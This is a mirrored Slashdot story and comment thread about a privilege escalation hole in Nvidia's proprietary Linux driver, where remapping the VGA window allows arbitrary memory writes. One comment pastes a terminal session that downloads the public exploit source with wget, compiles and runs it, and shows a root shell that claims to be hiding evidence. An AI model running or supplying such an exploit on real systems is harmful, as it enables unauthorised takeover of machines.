Slashdot Mirror
Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole
An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public."
The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
Use Windows and you don't get linux malware. True story, mod +5 true accordingly.
With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.
/* No Comment */
I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.
VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).
Maybe people need to stop being apologists for this kind of thing...
Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.
Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.
It's certainly legit..
c@v:~$ ... ... ./nvid-root
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225]
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#
sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise
sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#
Yeah you don't get more flimsy evidence than a working exploit.
If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.
Not too long ago Intel had a firmware exploit in their processors.
I still appreciate the effort Nvidia's made to support their cards on OSes such as linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.
Here's hoping they keep trucking along at it, even with what Linus' said and now this.
PS: I don't reply to ACs.
Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).
... that nobody uses anymore, at least not with PC hardware.
It is a miracle that curiosity survives formal education. - Einstein
Windows 7 still includes a VGA video driver.
It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.
So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.
Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!
Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"
The graphics driver is both monstrously large and operates at a very low level, there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmak put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.
I read the internet for the articles.
Frankly a root exploit is one of their lesser sins.
Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)
You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.
First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!
Over a year of data loss for anyone that believed them.
Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.
Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...
So how does Windows deal with restricting where this window can be remapped?
The world's burning. Moped Jesus spotted on I50. Details at 11.
VGA works fine in Windows and in Linux. See Linux framebuffer as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.
Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.
There's plenty of horsepower on the card
Platform-agnostic api, super-duper-thin wrapper libaries
It also solves all the whinging about binary blobs
Amen! I had a hell of a time trying to report a bug in the ATI driver as well. And how do you report a bug to netflix? All company web front pages should have big button that says "report bug". People are out here doing free QA for them and they aren't taking advantage. Plus I actually get pissed when I cannot report a bug. And I know I am not alone here, so it is bad PR.
Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.
Yes. When it does that, the OS has not yet loaded. Hell, the boot loader (GRUB in my case) has not yet loaded.
It's obviously implemented in hardware. That means it has nothing to do with the nVidia driver that my OS loads up and whether that nVidia driver supports EGA.
So okay, I'll rephrase my previous comment from "nobody uses it" to "no one needs the nVidia driver to provide it".
It is a miracle that curiosity survives formal education. - Einstein
I think they might have a culture of not listening. The chief maintainer of nvidia's official forums, posted after Linus outburst a series of post about how Linus complaints had cause "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.
Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??